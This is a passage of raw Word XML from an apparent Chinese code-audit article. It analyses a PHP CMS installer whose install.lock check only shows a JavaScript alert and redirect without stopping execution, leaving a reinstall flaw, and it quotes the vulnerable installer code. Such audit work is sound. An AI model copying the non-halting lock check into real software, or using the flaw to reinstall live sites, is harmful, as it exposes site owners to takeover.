          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:w w:val="95"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>本的时候，脚本会检测，如果目录下有这个文件就提示</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana"/>
          <w:w w:val="95"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:w w:val="95"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>请删除后再安</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:w w:val="95"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>装</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体"/>
          <w:sz w:val="29"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:spacing w:line="309" w:lineRule="auto"/>
        <w:ind w:left="417" w:right="417"/>
        <w:jc w:val="both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95"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>原本应该是没有任何问题的。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:w w:val="95"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>但我们来到安装脚本，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana"/>
          <w:w w:val="95"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">/app/controller </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">s/install.php </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>中，查看它是怎么处理的：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="11"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体"/>
          <w:sz w:val="15"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:pict>
          <v:shape id="_x0000_s3782" type="#_x0000_t202" style="position:absolute;margin-left:80.7pt;margin-top:12.5pt;width:337.5pt;height:148.65pt;z-index:793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6"/>
                    <w:rPr>
                      <w:rFonts w:ascii="宋体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class</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> Install extends Install_Controller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  construct ()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parent</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>::</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                      <w:spacing w:val="113"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> </w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>construct();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$this-&gt;load-&gt;</w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>library(</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>'myclass');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2012" w:right="1457"/>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                      <w:w w:val="95"/>
                    </w:rPr>
                    <w:t xml:space="preserve">$file=FCPATH.'install.lock'; </w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>if (file_</w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>exists(</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>$file)){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rPr>
          <w:rFonts w:ascii="宋体"/>
          <w:sz w:val="15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宋体"/>
          <w:sz w:val="7"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:left="231"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman"/>
          <w:spacing w:val="-49"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体"/>
          <w:spacing w:val="-49"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体"/>
          <w:spacing w:val="-49"/>
        </w:rPr>
        <w:pict>
          <v:shape id="_x0000_s3781" type="#_x0000_t202" style="width:337.5pt;height:99.7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rPr>
                      <w:rFonts w:ascii="Times New Roman"/>
                      <w:sz w:val="24"/>
                    </w:rPr>
                  </w:pPr>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:spacing w:line="338" w:lineRule="auto"/>
                    <w:ind w:left="180" w:right="700" w:firstLine="914"/>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>$this-&gt;myclass-&gt;</w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>notice(</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>'alert("</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>系统已安装过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color w:val="333333"/>
                    </w:rPr>
                    <w:t>");window.location.href="'.site_url().'";');</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:spacing w:before="44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6"/>
        <w:spacing w:line="243" w:lineRule="exact"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>看到</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>这</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>里我就笑了。</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>构造函数里</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>检查</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>是否存在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:spacing w:val="94"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>install.lock</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>，然后</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:spacing w:before="37" w:line="278" w:lineRule="auto"/>
        <w:ind w:left="417" w:right="434"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hAnsi="MS Mincho"/>
          <w:sz w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hAnsi="MS Mincho" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hAnsi="MS Mincho" w:hint="eastAsia"/>
          <w:spacing w:val="-89"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">javascript </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hAnsi="MS Mincho" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>的方式告</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>诉</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hAnsi="MS Mincho" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>户</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hAnsi="MS Mincho" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>系</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>统</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hAnsi="MS Mincho" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>已安装</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>过</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hAnsi="MS Mincho" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>，然后跳</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>转</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hAnsi="MS Mincho" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>。但是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>这</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hAnsi="MS Mincho" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hAnsi="MS Mincho" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hAnsi="MS Mincho" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>脚本根本</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>还</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hAnsi="MS Mincho" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>没有</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>结</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hAnsi="MS Mincho" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>束嘛，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>这</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hAnsi="MS Mincho" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>类</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hAnsi="MS Mincho" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>里的函数都可以运行，并不因</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hAnsi="MS Mincho" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>返回</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hAnsi="MS Mincho" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hAnsi="MS Mincho" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>了一个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hAnsi="MS Mincho" w:hint="eastAsia"/>
          <w:spacing w:val="-64"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">window.location.href </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hAnsi="MS Mincho" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>就停止运行。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="6"/>
        <w:spacing w:line="542" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:pict>
          <v:shape id="_x0000_s3780" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:80.7pt;margin-top:49.45pt;width:337.5pt;height:359.95pt;z-index:-362992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public</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> function step($step)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2012" w:right="1705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'step']=$step; if($step==1 || $step==2){</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:spacing w:before="2"/>
                    <w:ind w:left="2928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'permission']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$this-&gt;_</w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>checkFileRight(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$this-&gt;load-&gt;</w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>view(</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>'install',$data);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$step==3){</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:spacing w:before="126"/>
                    <w:ind w:left="2928" w:right="50"/>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>$this-&gt;_install_</w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>do(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_install_do()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4" w:line="391" w:lineRule="auto"/>
                    <w:ind w:left="2012" w:right="2789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'step']=3; if($_POST){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$dbhost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'dbhost');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$dbport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'dbport');</w:t>
                  </w:r>
                </w:p>
              </w:txbxContent>
            </v:textbox>
            <w10:wrap anchorx="page"/>
          </v:shape>
        </w:pict>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>this-&gt;myclass-&gt;</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>notice(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>中也没有停止运行的代</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>码</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>然后，在往下翻，就能看到安装的函数：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:spacing w:line="542" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
        </w:rPr>
        <w:sectPr w:rsidR="00292EF3">
          <w:footerReference w:type="default" r:id="rId98"/>
          <w:pgSz w:w="9980" w:h="14190"/>
          <w:pgMar w:top="1340" w:right="1380" w:bottom="1160" w:left="1380" w:header="0" w:footer="978" w:gutter="0"/>
          <w:pgNumType w:start="17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3779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$dbname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'dbname');</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:spacing w:before="124"/>
                    <w:ind w:left="3843" w:right="50"/>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>$dbuser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'dbuser');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$dbpwd =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  <w:w w:val="95"/>
                    </w:rPr>
                    <w:t>post(</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                      <w:w w:val="95"/>
                    </w:rPr>
                    <w:t xml:space="preserve">'dbpwd')?$this-&gt;input-&gt;post('dbpw </w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>d'):'';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$dbprefix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>dbprefix');</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:spacing w:before="126"/>
                    <w:ind w:left="3843" w:right="50"/>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>$userid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'admin');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2177" w:firstLine="3662"/>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t xml:space="preserve">$pwd = </w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>md5(</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>$this-&gt;input-&gt;post('pwd'));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r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>$email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$this-&gt;input-&gt;</w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>post(</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>'email');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332" w:firstLine="3662"/>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>$sub_folder = '/'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this-&gt;input-&gt;post('base_url').'/';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50" w:firstLine="3662"/>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t xml:space="preserve">$conn = </w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                      <w:w w:val="95"/>
                    </w:rPr>
                    <w:t>mysql_</w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                      <w:w w:val="95"/>
                    </w:rPr>
                    <w:t>connect(</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                      <w:w w:val="95"/>
                    </w:rPr>
                    <w:t>$dbhost.':'.$dbport,$dbuser,$dbpwd);</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:ind w:left="3843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(!$conn) {</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:spacing w:before="62"/>
                    <w:ind w:right="180"/>
                    <w:jc w:val="right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  <w:w w:val="95"/>
                    </w:rPr>
                    <w:t>die(</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
